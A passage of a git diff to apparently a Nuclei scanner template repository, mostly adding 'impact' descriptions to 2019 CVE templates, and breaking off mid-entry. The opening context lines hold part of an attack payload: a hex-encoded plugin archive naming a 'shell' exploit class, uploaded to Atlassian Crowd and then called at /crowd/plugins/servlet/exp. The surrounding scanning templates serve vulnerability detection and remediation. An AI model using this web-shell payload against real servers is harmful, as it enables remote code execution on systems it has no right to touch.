00000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}' @@ -43,7 +44,6 @@ http: {{plugin}} ------------------------------f15fe87e95a7-- - - | GET /crowd/plugins/servlet/exp HTTP/2 Host: {{Hostname}} diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index ad17c123a8..1bbd98544f 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -5,6 +5,8 @@ info: author: ree4pwn severity: critical description: Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the necessary security patches or upgrade to a fixed version provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index f0358593b5..395dec99ba 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -11,6 +11,8 @@ info: request is for an admin page). An unauthenticated attacker can consequently inject a payload into the plugin settings, such as the yuzo_related_post_css_and_style setting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index e9388e9aa5..16567490cc 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -6,6 +6,8 @@ info: severity: high description: | GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the entire system. remediation: | A patch for this issue was made on 2019-05-30 in GrandNode 4.40. reference: diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index e4ef3c672d..85458afcb8 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, or even a complete compromise of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Deltek Maconomy 2.2.5. reference: diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index ecc8cf947c..fd52d79be2 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 9b62c22086..212f84de3e 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -5,6 +5,8 @@ info: author: n-thumann severity: medium description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 9d7be50111..6de3c343f8 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -5,6 +5,8 @@ info: author: n-thumann,daffainfo severity: critical description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks. + impact: | + An attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges. remediation: | Apply the latest firmware update provided by Zyxel to fix the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 7d533a5ce3..45eb5627d0 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 9496094768..7b7792e24a 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -5,6 +5,8 @@ info: author: Mohammedsaneem,philippedelteil,daffainfo severity: medium description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement. + impact: | + An attacker can trick an authenticated user into performing unintended actions on the phpMyAdmin application. remediation: | Upgrade phpMyAdmin to version 4.9.0 or later to mitigate the CSRF vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 1062b6c543..b6173b8584 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0,akincibor severity: critical description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: Upgrade to 3.9.5. Be aware this product is no longer supported. reference: - https://www.zeroshell.org/new-release-and-critical-vulnerability/ diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 2f20b07f6f..2a9ba4272b 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire Citrix SD-WAN Center infrastructure. remediation: | Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 595eda0c20..ff411909b1 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the trace_route function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. remediation: | Apply the necessary patches or updates provided by Citrix to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 80ce6d9686..261163962f 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the apply action in StorageMgmtController. The callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for action, host, path, or type, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. remediation: | Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index f4e5bf51d2..dc71e61fd3 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the addModifyZTDProxy function in NmsController. The function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ztd_password, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data exfiltration, and potential compromise of the entire SD-WAN infrastructure. remediation: | Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 3173a84b99..91b2f25c54 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to local file inclusion via the applianceSettingsFileTransfer function in ApplianceSettingsController. The function does not sufficiently validate or sanitize HTTP request parameter values used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for filename, filedata, and workspace_id, therefore being able to write files to locations writable by the www-data user and/or to write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or denial of service. remediation: | Apply the latest security patches or updates provided by Citrix to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index e1320b131b..e6a6821102 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -5,6 +5,8 @@ info: author: Suman_Kar severity: critical description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. + impact: | + An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network. remediation: | Update the router's firmware to the latest version provided by D-Link. reference: diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 6229325043..0a86dc4b2a 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of MindPalette NateMail to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index b45ac3d19e..fb7136e135 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko,daffainfo severity: medium description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index 89e857eafb..bbfc4b26a4 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -5,6 +5,8 @@ info: author: divya_mudgal severity: critical description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Lansweeper system. remediation: | Apply the latest security patch or update provided by Lansweeper to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 44433a33dc..7a7be5c6a2 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution. remediation: | Update to the latest version of the plugin (0.6.67) or apply the patch provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 6f471e91bd..e084c0e377 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. remediation: | Apply the latest security patches or updates provided by Alfresco to fix the open redirect vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 84084bb455..6f9a5d7e5f 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server. reference: diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 2519d4664e..6c3a6deceb 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Upgrade to a patched version of Aptana Jaxer or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index a5f4d4638e..ce5c79420f 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Upgrade Pallets Werkzeug to version 0.15.5 or above to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 82a10a2b30..621ac756f0 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of UserPro or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index f66e9b2ac8..49c74f6a30 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -6,6 +6,8 @@ info: severity: high description: | OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. remediation: | Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index c39c1764c0..581a8e2624 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 6c01822562..2595e52fef 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade osTicket to version 1.12.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 7448d4f86b..6bfaac02a3 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index d5dfdc8a1b..87e6bd4468 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of SugarCRM Enterprise. reference: diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index fcbf92d097..97cdaded7a 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions. remediation: Upgrade to 6.3.4 or higher. reference: - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 20e7935d3d..d17cbc430b 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -5,6 +5,8 @@ info: author: bp0lr severity: critical description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with root privileges. remediation: | Upgrade to Webmin version 1.930 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index b67b7f83e9..83a29f051e 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a version of L-Soft LISTSERV that is higher than 16.5-2018a to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 8eda25daa2..8b51f14ca6 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -6,6 +6,8 @@ info: severity: high description: | rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users." + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. remediation: | Upgrade Webmin to version 1.920 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index ec9fca3d06..fb88f0789a 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,dhiyaneshDk severity: medium description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the My Calendar plugin (>= 3.1.10) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index b4f5edeb7c..a95eed4a50 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index c17e9e6065..ecb0bb760e 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and remote code execution. remediation: | Update to the latest version of the Woody Ad Snippets plugin (2.2.5) or apply the vendor-provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 67616c2383..60febcc27b 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI. + impact: | + An attacker can obtain sensitive information such as passwords, leading to unauthorized access. remediation: | Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index ebe65a1d44..2a63ef67ef 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update WordPress Download Manager plugin to version 2.9.94 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 9fa79509d7..b3ecd630a2 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 1793fdda86..109c71f6aa 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to escalate their privileges and gain unauthorized access to sensitive information. remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP. reference: - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 87c51b1c7a..dad18be591 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Upgrade to a patched version of PilusCart (>=1.4.2) or apply the vendor-supplied patch to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index a6e6f96ae8..0964a9489e 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify. + impact: 